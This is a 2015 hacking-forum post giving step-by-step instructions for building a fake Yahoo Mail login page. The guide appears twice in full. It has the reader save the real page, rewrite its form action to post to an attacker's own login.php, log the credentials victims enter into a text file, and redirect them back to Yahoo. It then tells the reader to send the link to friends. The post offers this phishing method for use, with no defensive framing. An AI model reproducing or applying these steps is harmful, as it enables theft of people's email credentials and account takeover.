How to create a fake login page. 08-16-2015, 06:45 PM
#1
Hello, this may be helpful to some however not to others. This is copy + pasted from a forum i previously used so excuse any hyperlinks etc missing.
Hope you guys enjoy, first of many guides to come.
1. Go to the Yahoo login page by typing the following URL.
mail.yahoo.com
2. Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)
3. Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email.
4. Make sure that the folder contains the necessary images and other support files.Now rename the Folder to ââ¬Åfilesââ¬Å.You may also rename the .HTML file to yahoo.HTML
5. Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.
For example you may find something like this in the opened HTML file
src=ââ¬ÂYahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gifââ¬Å
Rename the above link into
src=ââ¬Âfiles/ma_mail_1.gifââ¬Å
Repeat the same procedure for every file contained in the Folder.
6. Now search for the following term
action=
you will see something like this
Code:
action=https://login.yahoo.com/config/login?
Edit this to
Code:
action=http://yoursite.com/login.php
Save the changes to the file.
NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.
yoursite.com/
7. Now you have to upload your yahoo.HTML, files folder and login.php to
NOTE: Make sure that your host supports PHP
8. Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)
9. Once you do this distribute the Gmail.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file in your site.Download .TXT file to see the password inside
(P.S: This has been passed done through a friend, which i've edited/updated so credits to aabee also.)
Hope you guys enjoy, first of many guides to come.

1. Go to the Yahoo login page by typing the following URL.
mail.yahoo.com
2. Once the Yahoo login page is loaded, Save the page as Complete HTML file. (Not as .mht file)
3. Once you save the login page completely, you will see a HTML file and a folder with the name something like this Yahoo! Mail The best web-based email.
4. Make sure that the folder contains the necessary images and other support files.Now rename the Folder to ââ¬Åfilesââ¬Å.You may also rename the .HTML file to yahoo.HTML
5. Now open the .HTML file using a WordPad.Change the links of all the files present in the folder to /files.
For example you may find something like this in the opened HTML file
src=ââ¬ÂYahoo!%20Mail%20The%20best%20web-based%20email!_files/ma_mail_1.gifââ¬Å
Rename the above link into
src=ââ¬Âfiles/ma_mail_1.gifââ¬Å
Repeat the same procedure for every file contained in the Folder.
6. Now search for the following term
action=
you will see something like this
Code:
action=https://login.yahoo.com/config/login?
Edit this to
Code:
action=http://yoursite.com/login.php
Save the changes to the file.
NOTE: You can write your own code for login.php or search for login.php (Login script) on Google.
yoursite.com/
7. Now you have to upload your yahoo.HTML, files folder and login.php to
NOTE: Make sure that your host supports PHP
8. Configure the login.php file to save the entered password onto a .TXT file and redirect the user to original login page (mail.yahoo.com)
9. Once you do this distribute the Gmail.HTML URL (ie: yoursite.com/yahoo.HTML) to your friends.When they login from this fake login page, the login.php will save the username and password onto the .TXT file in your site.Download .TXT file to see the password inside
(P.S: This has been passed done through a friend, which i've edited/updated so credits to aabee also.)
Help, i need my peasant status removed! Donate to me.
>> https://www.sinister.ly/newpoints.php?action=donate <<
(contact me): xmpp: mental_neglect@dukgo.com
>> https://www.sinister.ly/newpoints.php?action=donate <<
(contact me): xmpp: mental_neglect@dukgo.com


![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)




![[Image: R5aCcWV.png]](http://i.imgur.com/R5aCcWV.png)
Thank you too, have a nice afternoon (or whatever it is where you're at) ^^










